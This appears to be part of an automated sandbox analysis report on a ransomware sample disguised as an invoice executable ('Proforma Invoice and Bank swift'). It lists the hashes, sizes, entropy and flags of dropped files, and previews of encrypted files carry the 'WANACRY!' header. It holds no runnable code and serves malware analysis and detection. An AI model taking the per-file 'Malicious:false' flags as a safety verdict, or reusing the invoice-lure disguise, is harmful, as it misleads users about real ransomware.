                                                          SHA1:5F76950C3617F24819E951FB7595627B05DED8FB
                                                          SHA-256:0F1AE6AF2F9FF57A2D5EB60C317196AD7734C0260603ECEBA7BD08C1395506DC
                                                          SHA-512:C324E84411A5681E9756138B7E6CA535BCDAF82363E2722FDC5B2E3955E3D6952E991DA4465EBDE7E6BA3C2924F9B6967091794ADAC663D340BE785FABCB842E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.867830108387937
                                                          Encrypted:false
                                                          SSDEEP:24:bkQxqsOg/vNNQlb2RRlejdl/DVzBBLkw6L5A4rgm0Zqma3wAl2WvSLwJTGINxzs8:bkQwsPHQoRRleRl/DVl9x6Le4QjE2Xsb
                                                          MD5:B24E662910CE877831753BC556455CA3
                                                          SHA1:5F76950C3617F24819E951FB7595627B05DED8FB
                                                          SHA-256:0F1AE6AF2F9FF57A2D5EB60C317196AD7734C0260603ECEBA7BD08C1395506DC
                                                          SHA-512:C324E84411A5681E9756138B7E6CA535BCDAF82363E2722FDC5B2E3955E3D6952E991DA4465EBDE7E6BA3C2924F9B6967091794ADAC663D340BE785FABCB842E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844865842767799
                                                          Encrypted:false
                                                          SSDEEP:24:bkHklBrWjER4A9yNSLwUtT5TzeTfPC3cToeJdw3LyGEdC+m97ioyL3pF2Ib:bkHkfWjEGPNSLwGT5333cTjK7v+mZio+
                                                          MD5:5BD1ACCF2C8C52500FD0CE37BCA9E4A4
                                                          SHA1:1B86EC7301C2679A2458E3EA28D59F5374D818C4
                                                          SHA-256:74FC70CA6B58D2D92FA3364C13C52D752F5EDE3CDBB451902B2EACEA0E82B336
                                                          SHA-512:3FB9A3FCB067A672F1C15A7DDB71D6C0FC3E67CF695ED7C343C99A6978E7205328EA4AA834038090680493EEA1D2B5DAA0EEDAD0DC0AC1D71F9405A8BD2D79F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844865842767799
                                                          Encrypted:false
                                                          SSDEEP:24:bkHklBrWjER4A9yNSLwUtT5TzeTfPC3cToeJdw3LyGEdC+m97ioyL3pF2Ib:bkHkfWjEGPNSLwGT5333cTjK7v+mZio+
                                                          MD5:5BD1ACCF2C8C52500FD0CE37BCA9E4A4
                                                          SHA1:1B86EC7301C2679A2458E3EA28D59F5374D818C4
                                                          SHA-256:74FC70CA6B58D2D92FA3364C13C52D752F5EDE3CDBB451902B2EACEA0E82B336
                                                          SHA-512:3FB9A3FCB067A672F1C15A7DDB71D6C0FC3E67CF695ED7C343C99A6978E7205328EA4AA834038090680493EEA1D2B5DAA0EEDAD0DC0AC1D71F9405A8BD2D79F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.864688134686405
                                                          Encrypted:false
                                                          SSDEEP:24:bkvZKXcJ39/aKH1o0UGvatqX3AdQvy8Rj6EEpc/twLKxPj0vFB8lAuI3q747ia:bkjJ3YV9tIAoAfuwLKxLkT8lt7s
                                                          MD5:07EFE5D9FD1ABEB050A148F40BE168F3
                                                          SHA1:7558C9C4955CE8065B28359393E4A8611AAE4EF3
                                                          SHA-256:ABAED11987B20884B76C0EA23EEB588AECD7B678C048E0D60AAC08FBFC7D7506
                                                          SHA-512:DD20B5F193955EF9730BF2ACD267AB0AB5DA19D3F42F19045E699D327CB3369B8B879B6D22A0BC4ABCEA9DBDB6B1E6EBDDD1672BCC7897022887E2274F58F4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....z...;]G...A.*6...F..k..N.~(...D..Bce.. ...!..T,.-7W.'.$..A.7(.I.:9G.....s...e..sy.1#$@.O.R......3d..z.%.z.[2&.ks.l.....s..D....z......f.....#r.Laws.+K..4.Zy.n...i.Q.....<q?....@........>A.j..[~...M.........*...2..M.\.f5..Ai.L.DI.C...xRc................~.@%.....-...P....Z.$p`.......1..bh..y.+.KE$X.!G..|(b..Q.....,...E...v...S.3..B..!...,...T.R.Rg..H........a...Ae.....t....#Y..o.k.=..N.}..e..J.vgs..\TN.0..l..M.,...-3..Fq.Z7A0.+....m..=1..M-...<Hd..G...o.w....=Nw.vH...$M...x.Jh/.V......&.5.[cdr..N...@..<..B.....9Y.l..<X....8.[D>.'......s;. .h.|..r..L...H..g..N>..G...J....z..!.....2..F#a...dr...ud.*......:..A.6.].q.8.,j..KH..e....'.8........[.h`[..... .....]........bd...I.g.b..e........k...%.....R...\.[@ZF.(.-U..k..Q..6...'Z..0{.4_js.{.....<A.!QN0V.F....qIl..D.)p%.....i....W._(...f...|9).I._ ;..R[#...ag*.[....2z.D:0H....HK...k....L.....1m..@....Vx.]....7....#9.....8.O.h.Z#..g.4....S.^y6.....r~.[.r..#*E..k~'.W.^.h.)...U..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854514020971324
                                                          Encrypted:false
                                                          SSDEEP:24:bk0JFZJ+3rZmy5yTRL/c+jthFbNCaXWnAfpq2FAyuZEKspDxf0A895R9c/DQvAlK:bkoZ83t00+BNNXWJEKWBn89rS/kegF
                                                          MD5:36F58FE1ABC2ADCC680328D6CBB6757F
                                                          SHA1:4185DA22C501B6D8214DA4335A2DA99E57566738
                                                          SHA-256:5D9DE0D1A49382243567630BB10A2926C0803C2878D4B907BA89D2E072359A13
                                                          SHA-512:157703A0CCB60D0785DF885A97C2F2AB318FB362B0C139A59970F1B5BBEF7FB6CEE1C25942437BA6DAC0A07F0E4376F0A1A037A8A3FABE71EC133623F295595F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(..5...'t....D}.`..Lm.."<.O..ia.d.b..}4....h..e$%...[c..?..~h..D3...<X.g..K...t......G+..b.c.......G....%..0...T....<5S...e.k..kL.o.....%....z...."].~#h.kx..0W*.mrI..@..x.Le.....S......eT.E....e..D...c..ZZ...P...>l80.F|.[..#FT..#$..84.3Y......................`...U.#!g,.w...\Iw.5..>...zN..A..`$2'i1.ra.V0qN.......39...@PPOj~iK..E.qr.r.....6..[..h.;.[..zG~.?...g....,".h....}...@.t...]._..4....Ph..0....I.07..!E.MU.Uz.D.d].Z....#....0..GQ...:......HB%...Y.l....".@,b.k..<...{....Q.........{.Y.g.......0....B..Z.41N....Y.1..wx....{1.v..2`.r...#.(.A..k....c].....r..O.?.}.BZ[...I+`.0...a...f.u...-P.j...]..\.H5...........oVz......L.M.K..lq.W.OU../x...T E.ES8.v...M...U~...vT[.1..6...1.....S....].B.#..Q.j.D;.G%R.Mj.Z.(H..y2Qh..1.).8...x.BI.S[....r.^...d%...r.\...*.5.N.Z.={S.y..y(.C.>.\....6l5X....[)U..%.....N......|... ..d....X.2..<(...h&.S4...2....Y....r.....p...d.wO=...5ev0K..L6..._.`y...0g..95..=................\^iB...6.F.T.+.....nCN.A..V5.u
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865157842880832
                                                          Encrypted:false
                                                          SSDEEP:24:bkATHo5hUH7TZcNAcbLIlV4+fDW5EL8EMOJvZs5JcHHAiUxE+9El:bkATHWUHxMAcofnapIrHA/xEWk
                                                          MD5:FBF3D85DD6468076AD2EF07DF88CD0D5
                                                          SHA1:BF54C00E3B6EFA1F8E7F407764C07803E9261652
                                                          SHA-256:475DF39F1065F906D2B787D69B14EE5AD6C49C882AB7CD2BF18571A1975397B9
                                                          SHA-512:9349E2032D13C49E8B8C7A347812279E0A73D9F2DF561914E5AF9A0E01627E147EB342B5FEF47969A6F14CEDC8F6DF27886FD3A8B1E8427826FE7B6A78B4106E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........)gR.....i=....i...`..]..q....F..u.b...i....%..R,.:E....f.%.$...D.g.0A.;.6-.P6..a(....y.z.f.D........O..B.Xw..">y...{.:...v"....<..i..>..=...J/...b..:..?...z...-2~.{d.|.2.h..7.Se...w.....0)Dc#..^..\..+....P..?...84[........:$N.....NMI.............(.........9.q._.y....xz.;...@..4.........w..1..P..x..g....5..}.....n..;*.5.cHd>*Ie....2.2f...r.|....x.(o.3.......f.Wtm|s.......T..e.:eY...r.D.U.PE.).(.you..;%vs.J~..Y.:.*......-W.mB..t.M..A.fQ.....7.P..kX.......%x.Y.[8Y....+.e..._4...2TU.9..?.tV....>.....L....Z....T.W...VQ..U..O......M.........b$....v ....S.q..sl.(P ,.a..wDz..a?m....a$0.3.R....3.RF....&`p..Y<g..eW.F#......w........gO^..!....I.....z.....JYyt..~......-......i..Y....`,.u..!}.\.e..1;s......J]|..}w...\3.|...s.#..%u./;...........6.+...Q'q..d......-..gU..\.xZc+.pt,...>Ir....>...-t.].#&.....gc..Ay........Z.F.,..H.X`yL#.g).V..s.1.E.,...!kbUqW..O..1\...V............`.<.X.2..zF.\.fMEE...A........J...;.A.#"
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844886838735367
                                                          Encrypted:false
                                                          SSDEEP:24:bk3oNRd0EOApf3YMIu1BXFVsNtkbFJ7xdgmfVPpnA8ONkyus9gIVSaWSIY9S3s/k:bkYTOyZFVxgmNBnAtN9v95VbCs/hxUn
                                                          MD5:BFFD7BEAFCDA1C986E48D72CFEE4F29B
                                                          SHA1:95300AB3DE5F0C6E6F4C05F9AAA90C553DB3B39A
                                                          SHA-256:334E02E579DB79E9A67CFAA10522ACE498A74C9AB20394BCF8B3B817E06DE3C2
                                                          SHA-512:EBC472C21065CF0502339C87B2C325DA684631F3E6F91D91873CCE32E755226EEC6664B2F1A5AE7FCFA99F25204A05AD185449225DEE4141496EE12D969F1906
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....b...w.....d..O#..].Z.Q"1.....(Mm....2..|E.a..].q......8.BQ...^.P...6..T.RD.p.N.^k..l.{.1.x.`.......0Q...Nn..H...\?C_C(..U3am1.p;x.V..].=.>....._WC..S.....$[...b..9.....`.0....TpFpKx....b.j..k3.<..>N$r..|...?...U..?..p....K.:&a{...F...n...q.............z:6..W.i......v..qj........+....y.,.W9-...}......;...*k.l*{....S....~#....'.].5.Y....F. ...R(.8.....lX._c.....<.Y. ..l).6 s6{=.%....n......$Y](.Zf....P...F.ye.....Yf...|.S.....$.$,q..I...G.f..7{..Mk<^..2.x.:..u.T...7i...VG~{...*`Ys....+.I.C.3.~..b.P.T......)....i.f@..7e^5.^q..0h....K..h.XI..6.c.1<&%$.?sO.............Xd...L....k......yR\~.?.....qO...B...>.;..C....<.o...j..|?.j|.kn..8E.._?+o......}-.X`N.o{..S....+5.r.W....v3Lo...C.W.X.........JKL..q.>.....%.zZ$a...D4.._....6....-..#.po....Rnh..)...Ba.s..\G.=A=v$))..^.q74..+. cZ.]r.........$.(a.Knj........Pxk|.d.`K.#8.#...2...j.43f.......B;...E\...U.......H..WQ.D..(P......L.......>..B.^........+.Z.....B"..W0....B.Q:_.~...d.e...:..V..F
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.83808430958597
                                                          Encrypted:false
                                                          SSDEEP:24:bk69WbMEJ8DvcVuQt/CAIrnPLTKGgO4HMBAG0g+NK0pt5LUblhb3fxb1pjv8N4:bkkddmxCJWFO4HYAGZWt5LGhrfxb1pjv
                                                          MD5:2F3DE02619B914364851A8B38210F281
                                                          SHA1:378B1B56B69D33164318798D6A597E45CC16DA74
                                                          SHA-256:BD631346A895A9CFBED56B23079624896089462EB536FA029F65A3D81E34C281
                                                          SHA-512:B577FB7237848BCAB1403B622938B2F08A82B3E23C70AEF3EDCF376249A61DF977D21DFDDE07720314F13B9174947172DB8C72D8A127D867EB42A37C235CDAB8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....+.`@...&.}.#ItJHo....xN.#...1'...h..!.K.....`c...t......:g. ..Z. Kw.O. .x....xE."..|*..:.X..A..=L.).....&R!2.V.]m...s.Q}.m-..z...U. -..JX[`.B./...'N...6.%..5L....QcF-......0g..8<.......ww AG.....0. t._.....3.A.N.O.......F\..;.......]#...*...............W"?....;......(i.QbIp......UCbz....f.-v...}.....@.L..+.@....4.^....1W..H....m..-ba..\.....D..1UU...5.8.. ...q?...N.C..b~........X#......3.x.....\.........L..\...C>.KBlg....,h$..R....X-.JH."_....$..>.n}....4.8te.1.....H...n..ee.o.o$;,.k........u.......@.....?r.=.V....2=~z..u.D..f..).Z....w...0.U.o.nJ...)i....S .U..V3=......N.`.m.....w....{Xo...5..*......,........R..;c.h*.(..y`...\..mn.R$..i.{.V..s......AJ.Y~.d......%5..W..`Q.%Jr.,.W.....~l.hI..E..(....2.p..6r_.7...((_..E.>.^..a.{..N=...q..7.......&y.`I;.z..A..m....-1.d.n...AY,.vb.QPb.n,..k..1#<..l(.h.....g.R...-...<1o.E...."^.X...;z.>(.A]..a.u.-4.~.....";..]..1.G6?;..k....Z.`......U..] o./H.j..?..".n..UT.p....V3<^...........#...c.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835397418606441
                                                          Encrypted:false
                                                          SSDEEP:24:bkDDIlqgd2fFY6bJU/UzDW9uFaojT/S1SNgsUedJykdzh+Nl75GXnyTw:bkXIlqf+suwF61SlUenva14nyk
                                                          MD5:E0DF0BF8892639C3BFD0264A9FC1B088
                                                          SHA1:EE555CC7EF4C327E3ABFC5D50A02D21B263BDFFF
                                                          SHA-256:8AFDD68F9D3A7F843ADFC5926D4C57BE3D56251484353B86FC6B8A9512A08A64
                                                          SHA-512:F04DBD8FBC9A8C26A7D770FEC32DB14F971E6BBE6EB8CF28B377379BD327813CBCE931B75CE2550ED2B95B989479D91873234C4411F68CB03C596C9ADAEE94F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1..+. .).(..W.......p..f\...t..e........0.....u..VS*......Q.....,qUM(K.b...#..!.$...8eY..LHh>.:?p?N......q]....C.i..l..G..xSi.(I!{p.r.;....C.P.#^...<@X.......W_T.....'..:H......J....@.....!...k.......+X=....3.6S?..*.x. -.......~..N.O..A.0...5............B......*.........(...[.......* ..j.....a..K.\.3.f.^o......W....2)........|..H.iF.0...:0j.naz..$_.....x..lP.J.([....}..J..8s..V:P.p.rJ.M..D.I.4.....P.M.U.B?&....M..u....od.{.n...P.....u......"..V.b.B.'.]..w.$.....B..Iz........Uo.bN..J..c.5.?.h.....GFa)..........U...l.1..G.}...#/(SY.0...j9i...@h`.....6...WP..A..p.^.. .e.%.7z\..N..<B."7*.4......g....`.w@.PL>.....t3a.F._...G`.5..5.[..l.I..2...`......N..tb...eE.!S.3.ny..._....r.$.H...j..<...G..j'..za.+....>.#.._}..............v......R..G.R.>...*.S.pN.... (W.....l...."..+.n7\.0!p.......Q<........k.j..{..z....v..+ps.).`..JJ'...G.[.PZ'.....i....E.,.s....IH.ZGLHNJeM..#.............\.1....l.h..5.....6..A.....+.../%.|=.......n..#.p
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834036981171114
                                                          Encrypted:false
                                                          SSDEEP:24:bkef24aaYvNwjyY5zc/oOplqSyqGiABoV8SrNxwot04FZfmlDtdMX:bk14aaYvNwjnzcgOplqSyox8QNmiStd8
                                                          MD5:49B2A6933AEBCA28785EAC16867CE920
                                                          SHA1:2B7BE4D6C777035738E7281F5356329B81D1E005
                                                          SHA-256:374FD210879029E867E1EB23E84374DB9AE7F7198761EEB9A133167580CA42FB
                                                          SHA-512:E0979167EBA0FFE8502BD57F744206EAB81E6681A3B77D140A7DC68265F0C0A5F96F1BD087E15403A0B8A4F4A821D211D7B2C07B68D1EED7D8B72773B74502FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....cC...TUY.SM.e%...C...s0c8m..[..{:...!.O*5.V..4..y........[...7..<.c._.V;...<.*......}.5J>...m....Q.....!...N/..;.<..2.c..a......9t.t"....h..v.a..=...).-..a._{p.T5.0Op...ON@#.O*......LnJj.r..%~v..|.KE.Rm.+..p......L....Jd+.]....[w.h..[...t5y~.............<.#..W.f'..B....sF..r1...$A..%?..U..3.6.....t......6s..f..}u@......8."$1...0...y.>B...5...T.S...0...tc.../...'TdF..b......We....G.z..:..JSO..>.1..J.7....Hp....hU..8.c...*......{5;...N.g9., o....6"..|.r..wH.y.EN*8s.x.w...+=.s....s..t.V.A.6.D.Xo....AD...T.H.U.Qf^Ef.._l.p.......|/.}X...D...2..4.o_f]...r..N@.Pb..{.....9c.Aj.gx..XZ>%.BT("=9...YE...........3.!..);p.\^.%...^I.....T....?U.v..... 8%...S.].s.(......#....>].....D.VATA.......q!.C...[;..u..e.,.4F<..+..`p.P.g.....hJ.8.\.....~.^c.M./....-.D.....~v....p...Cy.o!..t...R3....@&..y..~. .....4.d.A...h..3:@.:..[.B.O{.!....:.5....{.c..k7...C5...7{.scU-6.x(p>/.....&Z...l......s+s.....JA..........5................2........$"S.v.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834036981171114
                                                          Encrypted:false
                                                          SSDEEP:24:bkef24aaYvNwjyY5zc/oOplqSyqGiABoV8SrNxwot04FZfmlDtdMX:bk14aaYvNwjnzcgOplqSyox8QNmiStd8
                                                          MD5:49B2A6933AEBCA28785EAC16867CE920
                                                          SHA1:2B7BE4D6C777035738E7281F5356329B81D1E005
                                                          SHA-256:374FD210879029E867E1EB23E84374DB9AE7F7198761EEB9A133167580CA42FB
                                                          SHA-512:E0979167EBA0FFE8502BD57F744206EAB81E6681A3B77D140A7DC68265F0C0A5F96F1BD087E15403A0B8A4F4A821D211D7B2C07B68D1EED7D8B72773B74502FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.834618125394637
                                                          Encrypted:false
                                                          SSDEEP:24:bkV8TGLdzcA9qbgT9pAObp8bpXWDNkTFX8fiOXLSUqBiIPrXtj7bR/e5lcjiAGx5:bkVgUJTAO0pXXBlOXNZIxBe/c3GL
                                                          MD5:DF7C3538E50D4E9B08011A658FB4EAC0
                                                          SHA1:C916C62B47B73FC89615EA9480785FB4316CA98B
                                                          SHA-256:0B5657B56341D0DE18CE3D2BE959F0FB1BD64A50DAA9F18DD4D78C6EB11167D5
                                                          SHA-512:45C307B9B5DA5A60EA57CE37F6174D558BCC1766DC4790329C1FBD18CDA100F0C5D56710F27CECAA9B7C335F1C840F18AFCFC14AA33290602BD44DCBE9682A17
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.838079479165363
                                                          Encrypted:false
                                                          SSDEEP:24:bky6WFqYq/S86uTj6dIk+/drVaC4gjLrqNxQpQ2ZIYtEYYkgWiCUhE2EtTU+Wg2:bkfYiS8bnLk+VrValcMxYhtd/gTC2Emp
                                                          MD5:066895FE875320C4E936BEA907FD234D
                                                          SHA1:2E5959F392D461C90C8F99798D67FF22568584DE
                                                          SHA-256:1138B580283CB730D951978BA9015788A33256DF22B55F7FD5ACB89653F0B257
                                                          SHA-512:F9169BC1F573AC79BBA2C238621B27810615EC3636814EB2B15D5510A61BC782A3331ACE67B2F07154C3A7585410634CD21149F206984F386E16FD7FFB40AEE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858463873480814
                                                          Encrypted:false
                                                          SSDEEP:24:bktmJ8NA7rXjBJfXq3AmyuWkiM6Jwk5ygLF3/r9/rXKn6wnaqeys4SNDiNUAM:bkMCi7ruAmZDiM6+dmF3/r9DXxwaTfNV
                                                          MD5:9D48A7325BD56F2B90D986CBF9EDE115
                                                          SHA1:49384ADD357F2E77B17772F9997DE9F281E40D35
                                                          SHA-256:584418AB1EBBB7D34C39FCBBAD35EA5F630DAD29450B65F99790FD07B464AC96
                                                          SHA-512:C8C8B71BBC71194F46E3774A75FA51367524FC782F79D6CFF02C1080FCA6A983B6D8DC5F88908C9858364B11C6C1018127D63A1C89FA1AB8BD0BB703ADBA4843
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):21400
                                                          Entropy (8bit):7.991318982496033
                                                          Encrypted:true
                                                          SSDEEP:384:sWE29Xb/mW3qoVdqLdEUr1QzraPWYUNnu9BS3wRj6YLJp+G5LPMqAXDlVvAoSJT:sbKXyoVA2UrO6P1FBS3qjdLJMKLolVA1
                                                          MD5:064B31824463D3FE960C36E4AEF6DAC1
                                                          SHA1:BC1A7F045EA15A6B05D0D4472B100E8FF292BF48
                                                          SHA-256:B17DF472DFCB905075AB24ABD1A2E1847935E66911869C39D1668CB490F3B354
                                                          SHA-512:B1A4B6015844D5064D59F158AD7581D8DCA679C0A1247EB4CAE783574B57C169C99D851FF2A9A75D5ECF320DC68097CC62830C9FD6FCF5CAECA61A913EADC0BC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):440
                                                          Entropy (8bit):7.367682122684805
                                                          Encrypted:false
                                                          SSDEEP:12:bkE3vcfcu8l98vyOw2bqKRE1MBSdn0ZUxf24omMLUZ77Hf:bkaHL9aflbqN1MIB0ZeMoZ77Hf
                                                          MD5:FBE012A02B0A08D29CDB6CF0AFFCAE06
                                                          SHA1:1CB44F4AB8F732F799DC4A78BDCF9D6A23CEFDB0
                                                          SHA-256:562D83A60F16DD8CC7891E3CD7BDB0AB8DD3290AFFE5EA0181F78EE6C0FCCF2C
                                                          SHA-512:151FF6B17E15DF91DEB9BBEB48E625AAFFBE52EF7E0DB190287599A393AD0B0853F97B7078CFC00321BE0C982BFC2A934DDF5B6ADD6D0CE6BB707E9EE119EFD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):824
                                                          Entropy (8bit):7.697720844564862
                                                          Encrypted:false
                                                          SSDEEP:24:bkFUfy49zojtgQO8pkuLkNb5rcjbiA7MFYQl:bkuKk0+QOHuLkNtrqbiLYQl
                                                          MD5:401B05F3EF0313001EC026939623351D
                                                          SHA1:276CFA022C3C152A11EA92BCBD90CEFEF5C695CE
                                                          SHA-256:2EEFA7605D5FE2A88C0DB14BDC078E457FBF03C6EF7207C884232CC57C33966E
                                                          SHA-512:80B2A55EB233650148A44F86C34CF5F4EEAE706F8B688EED5452424C2816AEF6A19B0FA064A7A2E35B9A0C715FAFDFAF5C0A2D7B4DB6A92BD3A4195216D0E5CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):229656
                                                          Entropy (8bit):7.999192480564572
                                                          Encrypted:true
                                                          SSDEEP:3072:iXkbqMYmv1El+KDzjIZG7jAQR+6ir3SXs1vOBYvCJ+xEbr+YxapMC3y7JMH/:iXkbvbvxcjnvjR+p3r19Id6YxauMH/
                                                          MD5:1B1366EE74DF208FBA3426F035B076F4
                                                          SHA1:D25A8E8913FFA45A6E1B8D144430AF033845C648
                                                          SHA-256:26CD51C8280BD8EFE81010CE2857AAF9D6A358B3E71AB6FE3D45E9F848A8B9DB
                                                          SHA-512:E60299C2D166CB6A6FB9E8524C253F70F9779AC83162EBDBDF1F5DB9E9E1862F62D33CC72A7123467D496C2B89CC0D4BD8D9B72F5070956B0BDC38EDA23A055E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):295192
                                                          Entropy (8bit):7.999217367217706
                                                          Encrypted:true
                                                          SSDEEP:6144:0OxsnJTh6WoRcQZHif+z3+kv55IYpEAArsQea5EN55GLD:0ywYdRQ+TLIYpEhr4QEz5qD
                                                          MD5:33F070D4ACF1C09BA9A7DCEBBEB625A6
                                                          SHA1:6807E9D791D88EE3A391E3DB7E98B7234A555871
                                                          SHA-256:BB6692EDB0F0E9504D9DC7CFD13414B9C72E2D0D2D78854026F428208E9AEAF8
                                                          SHA-512:B1A98EE1546CE1735D0EBC7F928634A21F571CB82E99B667F574D2F179978BC6A89DC48F87278BC16EA2DA744B7263988E4328AF4B72D50782985E4CE4592292
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P2p..R..&q....s_.].BW6.#..~,.j..6.|.v........P..>......^r..V..cWi4<@..E|...*.R..D.1:.....y+..{7..fz. .0...'..b.....V........fr.<.)..LT..P....n..C.?...|G.].a9..D..GB..=q...U...E.vJ.sRh..<..)..`.."..4...$hev............)<.^'G.cR.j]Y.3.....~^.............\<F......%.7..;..b#l..NL:.Wz.TEl.uEN.....D...T.PP+ES....(......E...*../EI.k.....2"/.6...._...x.].....>r6..M.K.Q.p0..rl.......B/u...|.Ybp.^............(+E._.dE..1.J!......G.Zf..@[v...e.pG.X.B.].2.M..........u..l..........*..B..^....2.>....[.Az.%.5.s%.......r.^K...)[Z.....r.hd>Ez..9...}.Dz...%.@.W&DcM.:n..i{.8.#.EE.2&..q..c...,..cd.f.S.W/..[..... .....=.....+...B....h..f.VL.\,A.5.z..>...f.....w......j....e.].fqk...{4.2...(....\.`..n..0....B..A{...w.aI..i...|X1.E.T..?xpw.G.b.5....]......0$..f....`.....a....Q^. ) p.V....n.# 4....[>...?.{.E.z(h..w...{B.~.{..U....3G...S.#tX\o..~.2G-..-`u.B....._...da..>=..FXaJ.T....OXk..R..v.I./}{.}..<...T..>..1.$G.{Z..Yg"T...c.&J.8...X..L{
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):808
                                                          Entropy (8bit):7.731330807414836
                                                          Encrypted:false
                                                          SSDEEP:12:bkEDBt1mP3p5toe9hC97kclfA2oPQsdOzJ9PqyJpbs16tuQroLoce665DTa3UFWC:bk2mP3p5tzUY2uItZqa1scEQ8LovEsV
                                                          MD5:D70BD211451D397C3F34A859B3188B86
                                                          SHA1:D4E584FA0771DB68CEC150126F1B7F6527AF4CA4
                                                          SHA-256:03AFE15882CFFC067B00BB8AA9977599AB3F7362DDEC2515351DE5334FC0E8D1
                                                          SHA-512:08F50BFB7B1229E9873F6E922664F938697A4C823D11C16F52977E936C230A835804BF709547407B3850A132C51B62F9E122A87C83D5AF350F7F95B4AF6B67CC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......G)....v.(....0...~.J........=#.iZ.].B.....k!...no.e..3..A...g.N....E...W..........%+.....Za..@.q....J...}e.....Q.............(.:..[P.f\a.`..L.:.^~...~c"...*...../.C...)2........s%Y...=..u^.....Ehd.....c.Tg..b.hqF..a.;+..).<..t&BC...,/,...#...D.............J'Ui.oA......w.....)8*..`.`....W.!mn.s^ez..H.[..V..C)n....FW..u..N.t.rj.....Y.1..t.D...Y&.A.....P8X..zO......i.&a..kF..ry..^*(..S.........p...hF.-....".{..w.&..n:k.L+B....p.U..~Aw.@$.wMA.`.w;.'.9J.m..w..D._.".V.eX?.,.&.v{.L.... .[.!y4ppX$...1......y#........BC......6...K...D....q.s&.".].~..h..YZ^..d...o..`.....|.y.9.A......CCL...v..E.i1B..=..G.e.cV.....y....fcL.?<...".@..FP..t.~.....]O........K..v.A,.E*.{..;.|..[.8;v....zmL...iN.x...}..`..%..?.k...i.u......Q.1u.6.ZdB..._..;.h..x.6....S.!.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
